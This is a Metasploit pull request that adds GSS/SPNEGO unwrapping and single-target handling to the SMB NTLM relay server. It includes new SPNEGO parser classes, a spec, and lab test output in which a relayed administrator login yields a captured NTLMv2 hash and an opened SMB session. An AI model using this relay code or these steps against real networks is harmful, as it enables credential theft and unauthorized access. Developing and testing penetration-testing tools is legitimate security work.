### PR TITLE
Add support for Ruby SMB Client to be compatible with Msf::Exploit::Remote::SMB::RelayServer 

### DIFF
--- a/Gemfile.lock
+++ b/Gemfile.lock
@@ -102,7 +102,7 @@ PATH
       rinda
       ruby-macho
       ruby-mysql
-      ruby_smb (~> 3.3.15)
+      ruby_smb (~> 3.3.17)
       rubyntlm
       rubyzip
       sinatra (~> 3.2)
@@ -590,7 +590,7 @@ GEM
     ruby-progressbar (1.13.0)
     ruby-rc4 (0.1.5)
     ruby2_keywords (0.0.5)
-    ruby_smb (3.3.15)
+    ruby_smb (3.3.17)
       bindata (= 2.4.15)
       openssl-ccm
       openssl-cmac

--- a/lib/msf/core/exploit/remote/smb/client/kerberos_authentication.rb
+++ b/lib/msf/core/exploit/remote/smb/client/kerberos_authentication.rb
@@ -23,6 +23,7 @@ module Msf::Exploit::Remote::SMB::Client::KerberosAuthentication
 
     error = "Unable to negotiate kerberos with the remote host. Expected oid #{::Rex::Proto::Gss::OID_MICROSOFT_KERBEROS_5.value} in #{mech_types.map(&:value).inspect}"
     raise ::RubySMB::Error::AuthenticationFailure, error unless has_kerberos_gss_mech_type
+    @mech_type = :kerberos
 
     if smb1
       smb1_authenticate

--- a/lib/msf/core/exploit/remote/smb/relay/ntlm/server_client.rb
+++ b/lib/msf/core/exploit/remote/smb/relay/ntlm/server_client.rb
@@ -18,9 +18,7 @@ module Msf::Exploit::Remote::SMB::Relay::NTLM
       @listener = listener
     end
 
-    def prepare_relay( session)
-      session.metadata[:relay_target] = @relay_targets.next(session.metadata[:identity])
-
+    def prepare_relay(session)
       logger.print_status("Relaying to next target #{session.metadata[:relay_target]}")
 
       if session.metadata[:relay_target].protocol == :smb && session.metadata[:relay_target].ip == peerhost
@@ -45,7 +43,6 @@ module Msf::Exploit::Remote::SMB::Relay::NTLM
 
     def do_tree_connect_smb2(request, session)
       logger.print_status("Received request for #{session.metadata[:identity]}")
-
       # Attempt to select the next target to relay to
       session.metadata[:relay_target] = @relay_targets.next(session.metadata[:identity])
       # If there's no more targets to relay to, just tree connect to the currently running server instead
@@ -53,27 +50,7 @@ module Msf::Exploit::Remote::SMB::Relay::NTLM
         logger.print_status("Identity: #{session.metadata[:identity]} - All targets relayed to")
         return super(request, session)
       end
-
-      logger.print_status("Relaying to next target #{session.metadata[:relay_target]}")
-
-      if session.metadata[:relay_target].protocol == :smb && session.metadata[:relay_target].ip == peerhost
-        logger.print_warning('Relaying SMB to SMB on the same host will not work if the target has been patched for MS08-068')
-      end
-
-      relayed_connection = create_relay_client(
-        session.metadata[:relay_target],
-        @relay_timeout
-      )
-
-      if relayed_connection.nil?
-        @relay_targets.on_relay_end(session.metadata[:relay_target], identity: session.metadata[:identity], is_success: false)
-        session.metadata[:relay_mode] = false
-      else
-        session.metadata[:relay_mode] = true
-      end
-
-      session.metadata[:relayed_connection] = relayed_connection
-      session.state = :in_progress
+      prepare_relay(session)
 
       response = RubySMB::SMB2::Packet::TreeConnectResponse.new
       response.smb2_header.nt_status = FORCE_RETRY_SESSION_SETUP.value
@@ -110,6 +87,7 @@ module Msf::Exploit::Remote::SMB::Relay::NTLM
 
       # Prepare the relay now, if there's only one target to relay to and this is the first session setup message
       if @relay_targets && @relay_targets.each.size == 1 && request.smb2_header.message_id == 1
+        session.metadata[:relay_target] = @relay_targets.next(session.metadata[:identity])
         prepare_relay(session)
       end
 

--- a/lib/msf/core/exploit/remote/smb/relay/ntlm/server_client.rb
+++ b/lib/msf/core/exploit/remote/smb/relay/ntlm/server_client.rb
@@ -127,20 +127,18 @@ module Msf::Exploit::Remote::SMB::Relay::NTLM
       response
     end
 
-    def process_gss_wrapper(incoming_security_buffer)
-      gss_api = OpenSSL::ASN1.decode(incoming_security_buffer)
+    def process_gss_spnego_init(incoming_security_buffer)
+      gss_init = Rex::Proto::Gss::SpnegoNegTokenInit.parse(incoming_security_buffer)
+      ntlm_blob = gss_init.mech_token
+      raise ArgumentError, 'Failed to parse NTLMSSP Type1 message from GSS' unless ntlm_blob&.start_with?("NTLMSSP")
+      Net::NTLM::Message.parse(ntlm_blob)
+    end
 
-      # Parse type1 message
-      if RubySMB::Gss.asn1dig(gss_api, 1, 0, 1, 0)&.value
-        ntlm_token = RubySMB::Gss.asn1dig(gss_api, 1, 0, 1, 0)&.value
-      # Parse type3 message
-      elsif RubySMB::Gss.asn1dig(gss_api, 0, 0, 0)&.value
-        ntlm_token = RubySMB::Gss.asn1dig(gss_api, 0, 0, 0)&.value
-      end
-
-      raise ArgumentError, 'Failed to parse NTLMSSP from GSS' unless ntlm_token&.start_with?("NTLMSSP")
-
-      Net::NTLM::Message.parse(ntlm_token)
+    def process_gss_spnego_targ(incoming_security_buffer)
+      gss_targ = Rex::Proto::Gss::SpnegoNegTokenTarg.parse(incoming_security_buffer)
+      ntlm_blob = gss_targ.response_token
+      raise ArgumentError, 'Failed to parse NTLMSSP Type3 message from GSS' unless ntlm_blob&.start_with?("NTLMSSP")
+      Net::NTLM::Message.parse(ntlm_blob)
     end
 
     def relay_ntlmssp(session, incoming_security_buffer = nil)
@@ -150,7 +148,11 @@ module Msf::Exploit::Remote::SMB::Relay::NTLM
         if buf.start_with?("NTLMSSP\0")
           ntlm_message = Net::NTLM::Message.parse(buf)
         else
-          ntlm_message = process_gss_wrapper(incoming_security_buffer)
+          if session.metadata[:incoming_negotiate_message].nil?
+            ntlm_message = process_gss_spnego_init(incoming_security_buffer)
+          else
+            ntlm_message = process_gss_spnego_targ(incoming_security_buffer)
+          end
         end
       rescue ArgumentError, OpenSSL::ASN1::ASN1Error => e
         logger.print_error("Failed to parse incoming NTLM message: #{e.message}")

--- a/lib/msf/core/exploit/remote/smb/relay/ntlm/server_client.rb
+++ b/lib/msf/core/exploit/remote/smb/relay/ntlm/server_client.rb
@@ -140,17 +140,21 @@ module Msf::Exploit::Remote::SMB::Relay::NTLM
     end
 
     def process_gss_spnego_init(incoming_security_buffer)
-      gss_init = Rex::Proto::Gss::SpnegoNegTokenInit.parse(incoming_security_buffer)
-      ntlm_blob = gss_init.mech_token
-      raise ArgumentError, 'Failed to parse NTLMSSP Type1 message from GSS' unless ntlm_blob&.start_with?("NTLMSSP")
-      ntlm_blob
+      begin
+        gss_init = Rex::Proto::Gss::SpnegoNegTokenInit.parse(incoming_security_buffer)
+        gss_init.mech_token
+      rescue RASN1::ASN1Error => e
+        raise ArgumentError, "Failed to parse NTLMSSP Type1 message from GSS: #{e.message}"
+      end
     end
 
     def process_gss_spnego_targ(incoming_security_buffer)
-      gss_targ = Rex::Proto::Gss::SpnegoNegTokenTarg.parse(incoming_security_buffer)
-      ntlm_blob = gss_targ.response_token
-      raise ArgumentError, 'Failed to parse NTLMSSP Type3 message from GSS' unless ntlm_blob&.start_with?("NTLMSSP")
-      ntlm_blob
+      begin
+        gss_targ = Rex::Proto::Gss::SpnegoNegTokenTarg.parse(incoming_security_buffer)
+        gss_targ.response_token
+      rescue RASN1::ASN1Error => e
+        raise ArgumentError, "Failed to parse NTLMSSP Type3 message from GSS: #{e.message}"
+      end
     end
 
     def relay_ntlmssp(session, incoming_security_buffer = nil)
@@ -161,17 +165,16 @@ module Msf::Exploit::Remote::SMB::Relay::NTLM
           ntlm_message = Net::NTLM::Message.parse(buf)
           session.metadata[:ntlm_wrapper] = :none
         else
-          if buf.start_with?("\x60".b)  # 0x60 = [APPLICATION 0] -> negTokenInit
+
+          gss_api = OpenSSL::ASN1.decode(buf)
+          if gss_api&.tag == 0 && gss_api&.tag_class == :APPLICATION
             incoming_security_buffer = process_gss_spnego_init(incoming_security_buffer)
             ntlm_message = Net::NTLM::Message.parse(incoming_security_buffer)
-            session.metadata[:ntlm_wrapper] = :gss_spnego
-          elsif buf.start_with?("\xA1".b) # 0xA1 = [CONTEXT 1] -> negTokenTarg
+          elsif gss_api&.tag == 1 && gss_api&.tag_class == :CONTEXT_SPECIFIC
             incoming_security_buffer = process_gss_spnego_targ(incoming_security_buffer)
             ntlm_message = Net::NTLM::Message.parse(incoming_security_buffer)
-          else
-            logger.print_error("Unknown GSS/SPNEGO token type starting with byte: #{buf[0].ord.to_s(16)}")
-            return
           end
+          session.metadata[:ntlm_wrapper] = :gss_spnego
         end
       rescue ArgumentError, OpenSSL::ASN1::ASN1Error => e
         logger.print_error("Failed to parse incoming NTLM message: #{e.message}")

--- a/lib/msf/core/exploit/remote/smb/relay/ntlm/server_client.rb
+++ b/lib/msf/core/exploit/remote/smb/relay/ntlm/server_client.rb
@@ -18,6 +18,31 @@ module Msf::Exploit::Remote::SMB::Relay::NTLM
       @listener = listener
     end
 
+    def prepare_relay( session)
+      session.metadata[:relay_target] = @relay_targets.next(session.metadata[:identity])
+
+      logger.print_status("Relaying to next target #{session.metadata[:relay_target]}")
+
+      if session.metadata[:relay_target].protocol == :smb && session.metadata[:relay_target].ip == peerhost
+        logger.print_warning('Relaying SMB to SMB on the same host will not work if the target has been patched for MS08-068')
+      end
+
+      relayed_connection = create_relay_client(
+        session.metadata[:relay_target],
+        @relay_timeout
+      )
+
+      if relayed_connection.nil?
+        @relay_targets.on_relay_end(session.metadata[:relay_target], identity: session.metadata[:identity], is_success: false)
+        session.metadata[:relay_mode] = false
+      else
+        session.metadata[:relay_mode] = true
+      end
+
+      session.metadata[:relayed_connection] = relayed_connection
+      session.state = :in_progress
+    end
+
     def do_tree_connect_smb2(request, session)
       logger.print_status("Received request for #{session.metadata[:identity]}")
 
@@ -83,6 +108,11 @@ module Msf::Exploit::Remote::SMB::Relay::NTLM
         end
       end
 
+      # Prepare the relay now, if there's only one target to relay to and this is the first session setup message
+      if @relay_targets && @relay_targets.each.size == 1 && request.smb2_header.message_id == 1
+        prepare_relay(session)
+      end
+
       # Perform a normal setup flow with ruby_smb
       unless session&.metadata[:relay_mode]
         response = super
@@ -103,7 +133,11 @@ module Msf::Exploit::Remote::SMB::Relay::NTLM
       response.smb2_header.nt_status = relay_result.nt_status.value
       if relay_result.nt_status == ::WindowsError::NTStatus::STATUS_MORE_PROCESSING_REQUIRED
         response.smb2_header.nt_status = ::WindowsError::NTStatus::STATUS_MORE_PROCESSING_REQUIRED.value
-        response.buffer = relay_result.message.serialize if relay_result.message
+        if relay_result.message && session.metadata[:ntlm_wrapper] == :none
+          response.buffer = relay_result.message.serialize
+        elsif relay_result.message && session.metadata[:ntlm_wrapper] == :gss_spnego
+          response.buffer = RubySMB::Gss.gss_type2(relay_result.message.serialize)
+        end
 
         if @dialect == '0x0311'
           update_preauth_hash(response)
@@ -131,14 +165,14 @@ module Msf::Exploit::Remote::SMB::Relay::NTLM
       gss_init = Rex::Proto::Gss::SpnegoNegTokenInit.parse(incoming_security_buffer)
       ntlm_blob = gss_init.mech_token
       raise ArgumentError, 'Failed to parse NTLMSSP Type1 message from GSS' unless ntlm_blob&.start_with?("NTLMSSP")
-      Net::NTLM::Message.parse(ntlm_blob)
+      ntlm_blob
     end
 
     def process_gss_spnego_targ(incoming_security_buffer)
       gss_targ = Rex::Proto::Gss::SpnegoNegTokenTarg.parse(incoming_security_buffer)
       ntlm_blob = gss_targ.response_token
       raise ArgumentError, 'Failed to parse NTLMSSP Type3 message from GSS' unless ntlm_blob&.start_with?("NTLMSSP")
-      Net::NTLM::Message.parse(ntlm_blob)
+      ntlm_blob
     end
 
     def relay_ntlmssp(session, incoming_security_buffer = nil)
@@ -147,11 +181,15 @@ module Msf::Exploit::Remote::SMB::Relay::NTLM
         buf = incoming_security_buffer.to_s.b
         if buf.start_with?("NTLMSSP\0")
           ntlm_message = Net::NTLM::Message.parse(buf)
+          session.metadata[:ntlm_wrapper] = :none
         else
           if session.metadata[:incoming_negotiate_message].nil?
-            ntlm_message = process_gss_spnego_init(incoming_security_buffer)
+            incoming_security_buffer = process_gss_spnego_init(incoming_security_buffer)
+            ntlm_message = Net::NTLM::Message.parse(incoming_security_buffer)
+            session.metadata[:ntlm_wrapper] = :gss_spnego
           else
-            ntlm_message = process_gss_spnego_targ(incoming_security_buffer)
+            incoming_security_buffer = process_gss_spnego_targ(incoming_security_buffer)
+            ntlm_message = Net::NTLM::Message.parse(incoming_security_buffer)
           end
         end
       rescue ArgumentError, OpenSSL::ASN1::ASN1Error => e

--- a/lib/msf/core/exploit/remote/smb/relay/ntlm/server_client.rb
+++ b/lib/msf/core/exploit/remote/smb/relay/ntlm/server_client.rb
@@ -139,10 +139,22 @@ module Msf::Exploit::Remote::SMB::Relay::NTLM
       response
     end
 
+    def valid_ntlm_blob?(blob)
+      blob&.start_with?("NTLMSSP\x00")
+    end
+
+    def validate_ntlm_blob!(blob)
+      unless valid_ntlm_blob?(blob)
+        raise ArgumentError, 'The NTLM blob found was malformed'
+      end
+    end
+
     def process_gss_spnego_init(incoming_security_buffer)
       begin
         gss_init = Rex::Proto::Gss::SpnegoNegTokenInit.parse(incoming_security_buffer)
-        gss_init.mech_token
+        ntlm_blob = gss_init.mech_token
+        validate_ntlm_blob!(ntlm_blob)
+        ntlm_blob
       rescue RASN1::ASN1Error => e
         raise ArgumentError, "Failed to parse NTLMSSP Type1 message from GSS: #{e.message}"
       end
@@ -151,8 +163,10 @@ module Msf::Exploit::Remote::SMB::Relay::NTLM
     def process_gss_spnego_targ(incoming_security_buffer)
       begin
         gss_targ = Rex::Proto::Gss::SpnegoNegTokenTarg.parse(incoming_security_buffer)
-        gss_targ.response_token
-      rescue RASN1::ASN1Error => e
+        ntlm_blob = gss_targ.response_token
+        validate_ntlm_blob!(ntlm_blob)
+        ntlm_blob
+      rescue RASN1::ASN1Error, ArgumentError => e
         raise ArgumentError, "Failed to parse NTLMSSP Type3 message from GSS: #{e.message}"
       end
     end
@@ -161,7 +175,7 @@ module Msf::Exploit::Remote::SMB::Relay::NTLM
       # TODO: Add support for a default NTLM provider in ruby_smb
       begin
         buf = incoming_security_buffer.to_s.b
-        if buf.start_with?("NTLMSSP\0")
+        if valid_ntlm_blob?(buf)
           ntlm_message = Net::NTLM::Message.parse(buf)
           session.metadata[:ntlm_wrapper] = :none
         else

--- a/lib/msf/core/exploit/remote/smb/relay/ntlm/server_client.rb
+++ b/lib/msf/core/exploit/remote/smb/relay/ntlm/server_client.rb
@@ -127,14 +127,33 @@ module Msf::Exploit::Remote::SMB::Relay::NTLM
       response
     end
 
+    def process_gss_wrapper(incoming_security_buffer)
+      gss_api = OpenSSL::ASN1.decode(incoming_security_buffer)
+
+      # Parse type1 message
+      if RubySMB::Gss.asn1dig(gss_api, 1, 0, 1, 0)&.value
+        ntlm_token = RubySMB::Gss.asn1dig(gss_api, 1, 0, 1, 0)&.value
+      # Parse type3 message
+      elsif RubySMB::Gss.asn1dig(gss_api, 0, 0, 0)&.value
+        ntlm_token = RubySMB::Gss.asn1dig(gss_api, 0, 0, 0)&.value
+      end
+
+      raise ArgumentError, 'Failed to parse NTLMSSP from GSS' unless ntlm_token&.start_with?("NTLMSSP")
+
+      Net::NTLM::Message.parse(ntlm_token)
+    end
+
     def relay_ntlmssp(session, incoming_security_buffer = nil)
-      # TODO: Handle GSS correctly
-      # gss_result = process_gss(incoming_security_buffer)
-      # return gss_result if gss_result
       # TODO: Add support for a default NTLM provider in ruby_smb
       begin
-        ntlm_message = Net::NTLM::Message.parse(incoming_security_buffer)
-      rescue ArgumentError
+        buf = incoming_security_buffer.to_s.b
+        if buf.start_with?("NTLMSSP\0")
+          ntlm_message = Net::NTLM::Message.parse(buf)
+        else
+          ntlm_message = process_gss_wrapper(incoming_security_buffer)
+        end
+      rescue ArgumentError, OpenSSL::ASN1::ASN1Error => e
+        logger.print_error("Failed to parse incoming NTLM message: #{e.message}")
         return
       end
 

--- a/lib/msf/core/exploit/remote/smb/relay/ntlm/server_client.rb
+++ b/lib/msf/core/exploit/remote/smb/relay/ntlm/server_client.rb
@@ -161,13 +161,16 @@ module Msf::Exploit::Remote::SMB::Relay::NTLM
           ntlm_message = Net::NTLM::Message.parse(buf)
           session.metadata[:ntlm_wrapper] = :none
         else
-          if session.metadata[:incoming_negotiate_message].nil?
+          if buf.start_with?("\x60".b)  # 0x60 = [APPLICATION 0] -> negTokenInit
             incoming_security_buffer = process_gss_spnego_init(incoming_security_buffer)
             ntlm_message = Net::NTLM::Message.parse(incoming_security_buffer)
             session.metadata[:ntlm_wrapper] = :gss_spnego
-          else
+          elsif buf.start_with?("\xA1".b) # 0xA1 = [CONTEXT 1] -> negTokenTarg
             incoming_security_buffer = process_gss_spnego_targ(incoming_security_buffer)
             ntlm_message = Net::NTLM::Message.parse(incoming_security_buffer)
+          else
+            logger.print_error("Unknown GSS/SPNEGO token type starting with byte: #{buf[0].ord.to_s(16)}")
+            return
           end
         end
       rescue ArgumentError, OpenSSL::ASN1::ASN1Error => e

--- a/lib/rex/proto/gss/spnego_neg_token_init.rb
+++ b/lib/rex/proto/gss/spnego_neg_token_init.rb
@@ -1,7 +1,8 @@
 require 'rasn1'
 
 module Rex::Proto::Gss
-
+  # Initial negotiation token
+  # https://datatracker.ietf.org/doc/html/rfc4178#section-4.2
   class MechType < RASN1::Types::ObjectId
   end
 

--- a/lib/rex/proto/gss/spnego_neg_token_init.rb
+++ b/lib/rex/proto/gss/spnego_neg_token_init.rb
@@ -38,5 +38,13 @@ module Rex::Proto::Gss
     def mech_type_list
       self[:gssapi][:neg_token_init][:mech_type_list][:mech_type]
     end
+
+    def self.parse(str, ber: false)
+      token_init = super(str, ber: ber)
+      unless token_init.mech_token&.start_with?("NTLMSSP")
+        raise RASN1::ASN1Error "Invalid NTLM blob in SPNEGO NegTokenInit"
+      end
+      token_init
+    end
   end
 end

--- a/lib/rex/proto/gss/spnego_neg_token_init.rb
+++ b/lib/rex/proto/gss/spnego_neg_token_init.rb
@@ -38,13 +38,5 @@ module Rex::Proto::Gss
     def mech_type_list
       self[:gssapi][:neg_token_init][:mech_type_list][:mech_type]
     end
-
-    def self.parse(str, ber: false)
-      token_init = super(str, ber: ber)
-      unless token_init.mech_token&.start_with?("NTLMSSP")
-        raise RASN1::ASN1Error "Invalid NTLM blob in SPNEGO NegTokenInit"
-      end
-      token_init
-    end
   end
 end

--- a/lib/rex/proto/gss/spnego_neg_token_init.rb
+++ b/lib/rex/proto/gss/spnego_neg_token_init.rb
@@ -34,5 +34,9 @@ module Rex::Proto::Gss
     def mech_token
       self[:gssapi][:neg_token_init][:mech_token].value
     end
+
+    def mech_type_list
+      self[:gssapi][:neg_token_init][:mech_type_list][:mech_type]
+    end
   end
 end

--- a/lib/rex/proto/gss/spnego_neg_token_init.rb
+++ b/lib/rex/proto/gss/spnego_neg_token_init.rb
@@ -1,0 +1,37 @@
+require 'rasn1'
+
+module Rex::Proto::Gss
+
+  class MechType < RASN1::Types::ObjectId
+  end
+
+  class MechTypeList < RASN1::Model
+    sequence_of(:mech_type, Rex::Proto::Gss::MechType)
+  end
+
+  class ContextFlags < RASN1::Types::BitString
+    def initialize(options = {})
+      options[:bit_length] = 32
+      super
+    end
+  end
+
+  class NegTokenInit < RASN1::Model
+    sequence :neg_token_init, explicit: 0, class: :context, constructed: true,
+             content: [wrapper(model(:mech_type_list, Rex::Proto::Gss::MechTypeList), explicit: 0, constructed: true),
+                       wrapper(model(:context_flags, Rex::Proto::Gss::ContextFlags), explicit: 1, constructed: true, optional: true),
+                       octet_string(:mech_token, explicit: 2, constructed: true, optional: true),
+                       octet_string(:mech_list_mic, explicit: 3, optional: true)
+             ]
+  end
+
+  class SpnegoNegTokenInit < RASN1::Model
+    sequence :gssapi, implicit: 0, class: :application, constructed: true,
+             content: [objectid(:oid),
+                       model(:neg_token_init, Rex::Proto::Gss::NegTokenInit)]
+
+    def mech_token
+      self[:gssapi][:neg_token_init][:mech_token].value
+    end
+  end
+end

--- a/lib/rex/proto/gss/spnego_neg_token_targ.rb
+++ b/lib/rex/proto/gss/spnego_neg_token_targ.rb
@@ -36,13 +36,5 @@ module Rex::Proto::Gss
     def mech_list_mic
       self[:mech_list_mic].value
     end
-
-    def self.parse(str, ber: false)
-      token_targ = super(str, ber: ber)
-      unless token_targ.response_token&.start_with?("NTLMSSP")
-        raise RASN1::ASN1Error "Invalid NTLM blob in SPNEGO NegTokenTarg"
-      end
-      token_targ
-    end
   end
 end

--- a/lib/rex/proto/gss/spnego_neg_token_targ.rb
+++ b/lib/rex/proto/gss/spnego_neg_token_targ.rb
@@ -36,5 +36,13 @@ module Rex::Proto::Gss
     def mech_list_mic
       self[:mech_list_mic].value
     end
+
+    def self.parse(str, ber: false)
+      token_targ = super(str, ber: ber)
+      unless token_targ.response_token&.start_with?("NTLMSSP")
+        raise RASN1::ASN1Error "Invalid NTLM blob in SPNEGO NegTokenTarg"
+      end
+      token_targ
+    end
   end
 end

--- a/metasploit-framework.gemspec
+++ b/metasploit-framework.gemspec
@@ -151,7 +151,7 @@ Gem::Specification.new do |spec|
   spec.add_runtime_dependency 'net-ssh'
   spec.add_runtime_dependency 'ed25519' # Adds ed25519 keys for net-ssh
   spec.add_runtime_dependency 'bcrypt_pbkdf'
-  spec.add_runtime_dependency 'ruby_smb', '~> 3.3.15'
+  spec.add_runtime_dependency 'ruby_smb', '~> 3.3.17'
   spec.add_runtime_dependency 'net-imap' # Used in Postgres auth for its SASL stringprep implementation
   spec.add_runtime_dependency 'date', '3.4.1' # Temporarily pinned until 3.5 can be tested
   spec.add_runtime_dependency 'net-ldap'

--- a/spec/lib/rex/proto/gss/spnego_neg_token_init_spec.rb
+++ b/spec/lib/rex/proto/gss/spnego_neg_token_init_spec.rb
@@ -1,0 +1,15 @@
+# -*- coding:binary -*-
+require 'spec_helper'
+
+RSpec.describe Rex::Proto::Gss::SpnegoNegTokenInit do
+  let(:sample) do
+    ['605a06062b0601050502a050304ea00e300c060a2b06010401823702020aa23c043a4e544c4d5353500001000000358288e20e000e00200000000b000b002e0000006b65726265726f732e6973737565574f524b53544154494f4e00'].pack('H*')
+  end
+
+  it 'Correctly parses a sample' do
+    result = described_class.parse(sample)
+    expect(result.mech_token).to start_with('NTLM')
+    expect(result.mech_type_list[0].value).to eq("1.3.6.1.4.1.311.2.2.10")
+    expect(result[:gssapi][:oid].value).to eq("1.3.6.1.5.5.2")
+  end
+end


### PR DESCRIPTION
This fixes the following issues:
1.  [Ruby SMB Client is incompatible with Msf::Exploit::Remote::SMB::RelayServer](#19951). 
In order to relay NTLM authentication from a Ruby SMB client properly the NTLMSSP messages must first be unwrapped from their GSSAPI wrapping. The Window's `net use` does not wrap it's NTLM message and is partially why Metasploit's `smb_relay` has only worked with `net use` - until now! 

2. [smbclient is not compatible with Msf::Exploit::Remote::SMB::RelayServer](#20996)
Not all smbclients respond with a reauthentication attempt to the error code `STATUS_NETWORK_SESSION_EXPIRED` which our smb_relay server depended upon until now. This fixes the smb_relay server so that if only one `RHOST` is specified, NTLM authentication is immediately forwarded. This allows `smbclient` and others to be compatible the smb_relay when only specifying one target.

Due to do the large number of PRs and the fact that both of these fixes require the related fix in ruby_smb I figured I'd combine them.

## Requirements 
This fix requires changes from [ruby_smb](https://github.com/rapid7/ruby_smb/pull/292). Be sure to pull in those changes and reference your local copy of `ruby_smb` in your `Gemfile` prior to testing:
```
gem 'ruby_smb', path: '../ruby_smb'
```

## Testing
1. Start the relay server - input multiple RHOSTs to ensure the relay server is still able to relay to multiple targets
```
msf exploit(windows/smb/smb_relay) > set smbdomain kerberos.issue
smbdomain => kerberos.issue
msf exploit(windows/smb/smb_relay) > set rhosts 172.16.199.199 172.16.199.200 
rhosts => 172.16.199.199 172.16.199.200
msf exploit(windows/smb/smb_relay) > run 
[*] Exploit running as background job 8.
[*] Exploit completed, but no session was created.

[*] Started reverse TCP handler on 172.16.199.1:4444 
msf exploit(windows/smb/smb_relay) > [*] SMB Server is running. Listening on 0.0.0.0:445
[*] Server started.
```
(The relay server out will be continued below)

2. Start a second instance of `msfconsole` and run the `smb_login` module sending the authentication request to your relay server
```
msf auxiliary(scanner/smb/smb_login) > options

Module options (auxiliary/scanner/smb/smb_login):

   Name               Current Setting  Required  Description
   ----               ---------------  --------  -----------
   ABORT_ON_LOCKOUT   false            yes       Abort the run when an account lockout is detected
   ANONYMOUS_LOGIN    false            yes       Attempt to login with a blank username and password
   BLANK_PASSWORDS    false            no        Try blank passwords for all users
   BRUTEFORCE_SPEED   5                yes       How fast to bruteforce, from 0 to 5
   CreateSession      false            no        Create a new session for every successful login
   DB_ALL_CREDS       false            no        Try each user/password couple stored in the current database
   DB_ALL_PASS        false            no        Add all passwords in the current database to the list
   DB_ALL_USERS       false            no        Add all users in the current database to the list
   DB_SKIP_EXISTING   none             no        Skip existing credentials stored in the current database (Accepted: none, user, user&realm)
   DETECT_ANY_AUTH    false            no        Enable detection of systems accepting any authentication
   DETECT_ANY_DOMAIN  false            no        Detect if domain is required for the specified user
   PASS_FILE                           no        File containing passwords, one per line
   PRESERVE_DOMAINS   true             no        Respect a username that contains a domain name.
   Proxies                             no        A proxy chain of format type:host:port[,type:host:port][...]. Supported proxies: socks5, http, socks5h, sapni, socks4
   RECORD_GUEST       false            no        Record guest-privileged random logins to the database
   RHOSTS             172.16.199.1     yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT              445              yes       The SMB service port (TCP)
   SMBDomain          kerberos.issue   no        The Windows domain to use for authentication
   SMBPass            N0tpassword!     no        The password for the specified username
   SMBUser            administrator    no        The username to authenticate as
   STOP_ON_SUCCESS    false            yes       Stop guessing when a credential works for a host
   THREADS            1                yes       The number of concurrent threads (max one per host)
   USERPASS_FILE                       no        File containing users and passwords separated by space, one pair per line
   USER_AS_PASS       false            no        Try the username as the password for all users
   USER_FILE                           no        File containing usernames, one per line
   VERBOSE            true             yes       Whether to print output for all attempts


View the full module info with the info, or info -d command.

msf auxiliary(scanner/smb/smb_login) > run
[*] 172.16.199.1:445      - 172.16.199.1:445      - Starting SMB login bruteforce
[+] 172.16.199.1:445      - 172.16.199.1:445      - Success: 'kerberos.issue\administrator:N0tpassword!'
[*] 172.16.199.1:445      - Scanned 1 of 1 hosts (100% complete)
[*] 172.16.199.1:445      - Bruteforce completed, 1 credential was successful.
[*] 172.16.199.1:445      - You can open an SMB session with these credentials and CreateSession set to true
[*] Auxiliary module execution completed
msf auxiliary(scanner/smb/smb_login) >
```


3. Back in your relay server, see that the authentication request was successful and you now have an SMB session you can interact with:
```
[*] New request from 172.16.199.1
I, [2026-02-12T13:45:51.508983 #39704]  INFO -- : Starting thread for connection from 172.16.199.1
I, [2026-02-12T13:45:51.907731 #39704]  INFO -- : Negotiated dialect: SMB v2.0.2
D, [2026-02-12T13:45:51.949415 #39704] DEBUG -- : Dispatching request to do_session_setup_smb2 (session: nil)
D, [2026-02-12T13:45:52.014548 #39704] DEBUG -- : Dispatching request to do_session_setup_smb2 (session: #<Session id: 4179089651, user_id: nil, state: :in_progress>)
I, [2026-02-12T13:45:52.026555 #39704]  INFO -- : NTLM authentication request overridden to succeed for kerberos.issue\administrator
D, [2026-02-12T13:45:52.124182 #39704] DEBUG -- : Dispatching request to do_tree_connect_smb2 (session: #<Session id: 4179089651, user_id: "kerberos.issue\\administrator", state: :valid>)
[*] Received request for kerberos.issue\administrator
[*] Relaying to next target smb://172.16.199.199:445
[-] Timeout error retrieving server challenge from target smb://172.16.199.199:445. Most likely caused by unresponsive target
D, [2026-02-12T13:46:17.229921 #39704] DEBUG -- : Dispatching request to do_session_setup_smb2 (session: #<Session id: 4179089651, user_id: "kerberos.issue\\administrator", state: :in_progress>)
D, [2026-02-12T13:46:17.278971 #39704] DEBUG -- : Dispatching request to do_session_setup_smb2 (session: #<Session id: 4179089651, user_id: "kerberos.issue\\administrator", state: :in_progress>)
I, [2026-02-12T13:46:17.297245 #39704]  INFO -- : NTLM authentication request overridden to succeed for kerberos.issue\administrator
D, [2026-02-12T13:46:17.332264 #39704] DEBUG -- : Dispatching request to do_tree_connect_smb2 (session: #<Session id: 4179089651, user_id: "kerberos.issue\\administrator", state: :valid>)
[*] Received request for kerberos.issue\administrator
[*] Relaying to next target smb://172.16.199.200:445
D, [2026-02-12T13:46:17.362174 #39704] DEBUG -- : Dispatching request to do_session_setup_smb2 (session: #<Session id: 4179089651, user_id: "kerberos.issue\\administrator", state: :in_progress>)
I, [2026-02-12T13:46:30.765084 #39704]  INFO -- : Relaying NTLM type 1 message to smb://172.16.199.200:445 (Always Sign: true, Sign: true, Seal: true)
D, [2026-02-12T13:46:30.849669 #39704] DEBUG -- : Dispatching request to do_session_setup_smb2 (session: #<Session id: 4179089651, user_id: "kerberos.issue\\administrator", state: :in_progress>)
I, [2026-02-12T13:46:30.851325 #39704]  INFO -- : Relaying NTLMv2 type 3 message to smb://172.16.199.200:445 as kerberos.issue\administrator
[+] Identity: kerberos.issue\administrator - Successfully authenticated against relay target smb://172.16.199.200:445
[SMB] NTLMv2-SSP Client     : 172.16.199.200
[SMB] NTLMv2-SSP Username   : kerberos.issue\administrator
[SMB] NTLMv2-SSP Hash       : administrator::kerberos.issue:0d0719bece0ac1ce:51c99ec599139b20872db55375008ee2:0101000000000000003fef0b699cdc013483b98a24ef08f300000000020010004b00450052004200450052004f0053000100060044004300320004001c006b00650072006200650072006f0073002e0069007300730075006500030024006400630032002e006b00650072006200650072006f0073002e006900730073007500650005001c006b00650072006200650072006f0073002e006900730073007500650007000800ecb6690c699cdc010000000000000000

[*] SMB session 6 opened (172.16.199.1:58102 -> 172.16.199.200:445) at 2026-02-12 13:46:51 -0800
D, [2026-02-12T13:46:51.315641 #39704] DEBUG -- : Dispatching request to do_tree_connect_smb2 (session: #<Session id: 4179089651, user_id: "kerberos.issue\\administrator", state: :valid>)
[*] Received request for kerberos.issue\administrator
[*] Relaying to next target smb://172.16.199.199:445


